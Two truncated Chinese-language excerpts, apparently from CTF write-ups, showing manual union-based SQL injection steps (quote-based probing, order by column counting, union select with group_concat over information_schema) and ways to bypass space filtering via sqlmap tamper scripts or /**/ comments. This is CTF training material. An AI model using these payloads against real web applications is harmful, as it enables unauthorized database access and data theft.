1.确认是字符型注入1'#无回显 1' --+#有回显2.order by确认共有3列1'order by 3 --+ #有回显 1' order by 3 --+#无回显2.union注入,确认显示位-1'union select 1,2,3 --+ #回显2 3 3.获取表名:fl4g,notes -1' union select 1,2,group_concat(table_name) from information_schema.tab...
一,空格过滤的十三中脚本,由于本人比较偏爱sqlmap所以,在这里只留下了sql的空格过滤方式。 当然使用/**/代替空格手工注入同样可以。 –tamper “脚本名称” 二,ctfhubsql注入的空格过滤 倒数第二步如下图最后一步如下, CtfHub-web-sql注入 之前的一样,这次还少了后面的注释! 查看版本和库名爆出表名,继续爆出字段...